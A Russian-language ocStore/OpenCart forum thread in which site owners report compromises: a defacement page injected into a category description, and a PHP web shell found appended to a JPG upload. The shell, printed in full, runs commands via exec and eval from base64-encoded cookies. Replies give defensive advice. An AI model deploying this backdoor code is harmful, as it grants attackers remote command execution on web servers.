Перейти к содержанию
Einshtein

Срочно! Взлом или баран?

Рекомендуемые сообщения

Вчера все было нормально, сегодня вижу в админке вот такое...

Изображение

на пользовательской части вот такое:

Изображение

Сейчас свяжусь с хостингом...бекапы как на зло 2х недельной давности, ПОделитесь идеями в дальнейших действиях!

Спасибо!

Ps забыл сказать что сайт работает на ocstore 1.5.1.3 (tmz.com.ua)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Дал запрос хостеру (avahost.ua), благо у них вчерашний бекап остался...Надеюсь всё обойдётся. Но защитой ихней я крайне удивлен...при выборе хостинга акцент делал на тех поддержке и защите...поддержка нормальная, а вот с защитой уже косяк вышел :(

в описание категории они втулили вот такой код:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<title>Hacked 1923Turk Grup - Emre5807 - Українці про підготовку необгрунтованими відео. Отримайте ваші ноги падає!</title>
<style type="text/css">
<!--
body {
background-color: #000000;
}
.style1 {
font-size: 16px;
font-weight: bold;
color: #FFFFFF;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style2 {color: #FF0000}
.style3 {
color: #FFFFFF;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 14px;
font-weight: bold;
}
.style4 {font-size: 12px}
-->
</style></head>
<body>
<div align="center">
  <pre><img src="http://a1211.hizliresim.com/13/y/gf071.jpg" width="700" height="392" border="0">
<span class="style1">'' Ukrainians about preparing unfounded video. Get your foot falls! ''<br>'' <span class="style2">Hakkımızda asılsız video hazırlayan ukraynalılar. Ayağınızı denk alın!</span> ''<br>'' Українці про підготовку необгрунтованими відео. Отримайте ваші ноги падає! ''</span></pre>
	<tr>
		<td colspan="2">
			<img src="http://img25.imageshack.us/img25/6790/ozkuv05.gif" width="890" height="88" alt=""></td>
	</tr>
  <font size="5"
<div align="center"><font face="Book Antiqua"><strong>
<HR color=red SIZE=3>
  <font color="#F25951"> 1923Turk-Grup | Emre5807  </font>
<embed src="http://www.kurtlarvadisigladio.com/soundtrack.swf" width="0" height="0" loop="true" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"><br />
</body>
</html>

Только сейчас заметил что с площадки которую мы используем под несколько сайтов исчез полностью каталог с сайтом наших брендовых навигаторов и не открывается субдомен с другим сайтом.

Короче я домтрубашатал этих турков мать их

Официальный сайт этих рицидивистов

http://1923turk.com/
Вдруг кому понадобится

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Так что с защитой? Хакнули другой сайт на серваке или дырка в опенкарте?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

судя по всему хакнули площадку на хосте (незнаю по фтп или както иначе как там хеккеры хакают). Суть в том что 2 сайта вообще удалили (правда бд оставили на месте), а на Опенкарте удалили все категории и создали свою с угрозами. Судя по всему до ОС они добрались через бд, так как невозможно удалить категории не отвязав от них товары, а товары все остались нетронутые.

Вчера хостер восстанавливал пол дня, так как сайт занимает 14гб то процесс затянулся, и под конец востановления резервной копии постоянно происходил какойто сбой. В итоге БД они востановили, а бекап просто залили в отдельную папку мне на прощадке и я ручками востанавливал все файлы до полуночи...

Короче я зол и истощен...а ещё мстителен и злопамятен...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

кстати пока на сайте небыло категорий - сайт летал как угорелый. Может в связи с этим есть какиенить идеи? сейчас оформлю отдельную тему

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Дык писали уже вроде 1.5.1.3 дырявый же...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

присоединюсь к теме.

ocStore Version 1.5.3.1

сегодня обнаружил в папке download 2 файла

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

и index.html

в index.html ничего вроде страшного.

а вот jpg сначала идете картинка, а потом код:

<?php
	echo "$#@&nn";

	if(isset($_COOKIE['76027405']) && !empty($_COOKIE['76027405'])) {
		echo htmlentities((string) base64_decode($_COOKIE['76027405']),ENT_QUOTES);
		echo "<pre>";
		$outbuf="";$outstr="";exec(base64_decode($_COOKIE['76027405']),$outbuf);foreach($outbuf as $val) $outstr.=$val."rn";echo htmlentities($outstr);
	} elseif(isset($_COOKIE['26312595']) && !empty($_COOKIE['26312595'])) {
		echo htmlentities((string) base64_decode($_COOKIE['26312595']),ENT_QUOTES);
		echo "<pre>"; 
		eval((string) base64_decode($_COOKIE['26312595']));
	} elseif(isset($_COOKIE['13037085'])) {
		phpinfo();
	}

?>

вроде остальные файлы не затронуты.

взломали или попытка взлома?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

взломали или попытка взлома?

попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

набрал - показывается jpg

может удалить папку download? она вообще нужна?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

набрал - показывается jpg

может удалить папку download? она вообще нужна?

настройте файл .htaccess

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

PHP код в файле изображения это код для взлома. Ищите срочно последствия его действий. Если вставят какой нибудь редирект на порносайт для мобильных устройств например, то через несколько месяцев такой работы ваш сайт может вылететь из индекса яндекса полностью. Яша воспримет ваш сайт как торговца рекламой и опустит в выдаче по самые некуда. Придется переезжать на другой домен. Проверяйте htaccess, index.php во фронте и в админке. Обращайте внимание на дополнительные инклуды в начале и конце файлов. Ищите фрагменты кода, закрытые обфускатом. Если обнаружили это в папке загрузки, все нужно удалять и проверять, как туда могли закинуть файл. Возможно это обусловлено настройками OC.

Да. Еще любопытства ради выведите на печать ту строку, которая передается на eval. Она у вас сидит в куках и она туда как то попала. Вопрос как?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вчера на двух сайтах опять в папке download появились файлы:

типа

route.php.jpg.4cbd766fa1992fd76fc6858c8cb1e757

в папке download лежит .htaccess такого содержания.

<Files *.*>

Order Deny,Allow

Deny from all

</Files>

как еще бороться?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

суть в том, что если отображается картинка - взлом не прокатил

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ну и совет продавцам, у которых опций в виде файла удалите метод upload из catalog/controller/product/product.php

Изменено пользователем freelancer
  • +1 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

суть в том, что если отображается картинка - взлом не прокатил

первый раз когда увидел файл (aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49) в декабре отображалась картинка.

сегодня site.com/download/route.php.jpg.4cbd766fa1992fd76fc6858c8cb1e757 - выдает страница не найдена.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

если файл на месте, а вместо "картинки" получаете 404 (страница не найдена), скорее всего изменились настройки сервера. в худшую для вас сторону.

файлы с расширениями изображений должны отдаваться сервером только как изображения.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.